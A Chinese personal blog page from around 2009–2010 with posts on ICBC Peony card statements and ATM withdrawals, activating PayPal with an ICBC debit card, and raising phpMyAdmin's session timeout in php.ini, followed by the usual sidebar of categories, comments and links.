对帐单：银行每月为牡丹国际卡持卡人寄发对帐单，持卡人凭对帐单与发卡机构对帐，并据以掌握其牡丹卡帐户情况。持卡人若发现对帐单上的交易不符，应在两周内与发卡机构核对。未收到或遗失对帐单的持卡人可要求发卡机构补寄对帐单，也可凭牡丹卡、身份证件到发卡机构申请补打对帐单。
　
自动取款机(ATM)：牡丹国际卡在国外取现时，威士卡可在任何有VISA、PLUS标识的ATM上提取一定金额的当地货币，万事达卡可在有MasterCard标识的ATM机上提取一定金额的当地货币。取款时请按ATM机的提示进行操作，最后取出国际卡、现金和交易单据。取款时必须使用密码。
三、工商银行的国际借记卡激活Paypal的过程
当你的卡上有钱时，你要打电话给北京的总行，要求开通网上交易服务。你可以打这个电话查询有关事项和要求开通网上交易服务。010-66108502.登陆你的Paypal帐号。登陆之后会见到这样，在左上按Add credit card　进入，如图，并按说明填写。当你通过之后，你的借记卡就会减少1美元。记住！你只要求确认一次就行了，否则，你再要求它一次确认，你的借记卡就会减少1美元，这是工商行的手续费，你作一笔交易，它就会收你1美元！假如你要求它多次，你就作了多笔交易,切记！请注意：此时你并没有完全激活Paypal卡。假如你有传真机的话你就很快激活Paypal卡，你打上面那个电话，它有自动传真的。你按它的留言去做，它就会自动传真对帐单给你。打通了之后，操作是这样：输入1－1－你的卡号－你的银行密码－4。如果你没有传真机，你只能等它的月对帐单。
你的对帐单出来之后，在上面有一栏这样的：PayPal xxxx * Co 800-836-1859，那4个xxxx就是PayPal给你的确认码！你登陆Paypal，将这4个数字填上去，激活就行了。到这里你就真正激活Paypal。你的帐号会见到这样的了。
四、注册使用PayPal需要注意的几个问题
一、你必需有一张国际通用的信用卡，比如说Visa card(维萨卡)Master card（万事达卡）。目前PayPal只承认这两种信用卡！！目前中国人民银行，工商银行，建设银行有信用卡的服务，申请时请注意是否为国际通用的，而且是否可以用于网上交易！
二、 PayPal要求注册时使用信用卡注册，目的在于2个：一个是在申请时可以即时验证你所提交的信用卡是否有效（因为你若是没有可以转帐的银行支票帐号的话，你只可以将PayPal帐号的钱转到你的信用卡上）；另一方面，PayPal在注册时验证你所提交的信用卡资料后，将会在你这张信用卡的帐面扣1美元，对你的这张信用卡的有效性进行检验。
三、即使是激活的帐户也无法用国际卡取钱，要取钱必须有美国银行的帐户。现在想取钱可以托美国的朋友帮忙，或者在网上购物。也可以把钱留着，等入世后，美国的银行进入中国，那时再申请一个帐户就可以取钱了。
四、注册后要想得到$5的奖励，必须先用国际卡激活帐户，再一次发给别人$100以上，才能得到$5。
五、没有必要推荐别人加入paypal，因为推荐别人加入奖励$5，好像这条规定只对美国会员有效。

Tags: ask, blog, code, get, Html, mail, paypal, pr, rm, vi, word, 链接

解决phpmyadmin“登陆超时（1440秒未活动），请重新登录”问题

八 11

Posted by CrazyLemon in PHP | No Comments| 222 views

phpmyadmin 在使用过程中经常出现“登陆超时（1440秒未活动），请重新登录”，很烦

解决方法如下：

修改php.ini，找到

session.gc_maxlifetime = 1440

将数值改大就行了，然后使之生效

Tags: blog, div, PHP, php.ini, phpmyadmin, time, 链接

最近评论

衣服在 3.8 上的评论
济南网站优化在 3.8 上的评论
Kobe Bryant 在 3.8 上的评论
啊龙在 zen cart sitemap xml language=en 上的评论
rpwt 在 zen cart 二次开发进程上的评论
时尚在这些天上的评论
minstrel 在这些天上的评论
ping 在腾讯通RTX破解版上的评论
淘宝网网上购物女装在这些天上的评论
Kobe Bryant 在这些天上的评论
分类目录

Apache (4)

DIV+CSS (1)

FTP SERVER (6)

Google资讯 (12)

Html (5)

Linux (79)

MySQL (15)

Nginx (20)

PHP (51)

SEO (48)

Windows (28)

WordPress (20)

ZenCart (26)

下载 (1)

产品 (8)

外贸 (4)

奇文趣事 (7)

工作 (80)

开心一刻 (11)

物理 (1)

生活 (112)

疯狂的柠檬 (222)

百科 (49)

虚拟主机 (30)

链接 (1)

音乐 (4)

黑客技术 (2)
热门文章

腾讯通RTX2009 Beta1完美破解版 - (5,627 views)
国内八家域名注册商优缺点比较 - (4,342 views)
navicat8.1.20官方简体中文版及注册码 - (2,829 views)
6月17号工作日志 - (2,610 views)
几大搜索引擎的网站登录入口 - (2,291 views)
bind() for address ‘127.0.0.1:9000′ failed: Address already in use - (2,142 views)
海蜘蛛（Hi-Spider）pptp vpn设置 - (2,138 views)
将CentOS 4.7（2.6.9）核心升级为CentOS 5.2（kernel-2.6.18-128.1.6.el5） - (2,118 views)
关于RTX腾讯通2009beta1的破解方法 - (1,789 views)
About - (1,771 views)
文章索引模板

2010年三月 (9)

2010年二月 (20)

2010年一月 (40)

2009年十二月 (41)

2009年十一月 (73)

2009年十月 (88)

2009年九月 (108)

2009年八月 (79)

2009年七月 (135)

2009年六月 (153)

2009年五月 (30)

2009年四月 (6)

2009年三月 (4)

2009年二月 (22)

2009年一月 (9)

2008年十二月 (3)

2008年十一月 (1)

2008年一月 (2)
友情链接

Coach Outlet

LED Lights

MVPzhang 小P孩的勃客

SEO 李展seo.专注莆田SEO

SEO SEO动态

外贸博客

心神不宁老邓的博客

我不是天使我不是天使

我是阿布 “帅哥”的个人博客

我的淘宝店疯狂的柠檬|淘宝店

海盗船长探索英文SEO,实践外贸SEO

深圳SEO 专业提供网站优化,SEO优化服务

爱直至成伤洞洞的博客

疯狂王子老吴的博客

荷包蛋博客好的心态是成功的开始

蜡笔小鑫蜡笔小鑫

邹清水的博客清水-你的朋友

陈源的博客陈源的博客

黑链黑链出售
功能

注册

登录

文章 RSS

RSS 评论

WordPress.org

上帝无用，天使无用

Posts Tagged blog

最近评论

分类目录

热门文章

文章索引模板

友情链接

功能